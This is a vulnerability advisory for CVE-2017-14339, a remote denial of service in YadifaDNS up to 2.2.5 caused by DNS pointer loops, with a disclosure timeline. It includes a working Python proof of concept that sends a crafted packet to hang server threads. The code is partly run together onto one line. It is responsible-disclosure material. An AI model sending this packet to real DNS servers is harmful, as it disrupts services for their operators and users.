# CVE-2017-14339: Remote Denial of Service in YadifaDNS
[![](https://img.shields.io/badge/Attack%20Vector-Remote-red?style=flat-square)]() [![](https://img.shields.io/badge/Privileges%20Required-None-red?style=flat-square)]() [![](https://img.shields.io/badge/User%20Interaction-No-red?style=flat-square)]()


__Vendor:__ EURid<br>
__Vendor URL:__ https://www.yadifa.eu<br>
__Versions affected:__ YadifaDNS <= 2.2.5<br>
__Discovered by:__ Javier Gil ([@ca0s_](https://twitter.com/ca0s_))<br>
__Public fix:__ Yes<br>
__Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2017/CVE-2017-14339/)) <br>

## Summary
The DNS packet parser in YADIFA before 2.2.6 does not check for the presence of infinite pointer loops, and thus it is possible to force it to enter an infinite loop. This can cause high CPU usage and makes the server unresponsive.

## Details
The DNS packet parser does not check for the presence of infinite pointer loops, and thus it is possible to force the thread to enter an infinite loop. The number of threads running on the service that process DNS messages depends on the server’s configuration, so the number of packets needed to make the server to completely stop answering is not fixed. Each time we send the packet, a thread will get stuck forever, until no more threads are available.

The following is a simple PoC:

```python
# Yadifa DoS PoC
# Discovered by: Javier Gil (@ca0s_)
import socket
import sys
if __name__ == '__main__':
        if len(sys.argv) < 2: print "Usage: %s IP [PORT]" % (sys.argv[0], ) sys.exit(-1) IP = sys.argv[1] if len(sys.argv) >= 3:
                PORT = int(sys.argv[2])
        else:
                PORT = 53
        exploit = "3132000000010000000001010a6b61306c6162732d000100000e100006036e7336c00cc02300"
        print "[+] Yadifa DoS PoC"
        print "[+] Sending packet..."
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
        sock.sendto(exploit.decode("hex"), (IP, PORT))
        print "[+] Sent!"
```

## Impact
An attacker can cause a denial of service.

## Recommendation
Update to last version.

## Timeline
* 01/09/2017 – Initial contact with EURid’s security team and bug report, following a strict FD policy (Friday Disclosure)
* 01/09/2017 – Got an answer from EURid, information forwarded to yadifa developers
* 04/09/2017 – PoC sent to EURid
* 08/09/2017 – Bug reproduced by EURid’s developers, start developing a patch
* 11/09/2017 – Contact with MITRE
* 12/09/2017 – CVE-2017-14339 assigned
* 13/09/2017 – yadifa 2.2.6 released, bug fixed

#

[![](https://img.shields.io/badge/www-blackarrow.net-E5A505?style=flat-square)](https://www.blackarrow.net) [![](https://img.shields.io/badge/twitter-@BlackArrowSec-00aced?style=flat-square&logo=twitter&logoColor=white)](https://twitter.com/BlackArrowSec) [![](https://img.shields.io/badge/linkedin-@BlackArrowSec-0084b4?style=flat-square&logo=linkedin&logoColor=white)](https://www.linkedin.com/company/blackarrowsec/)
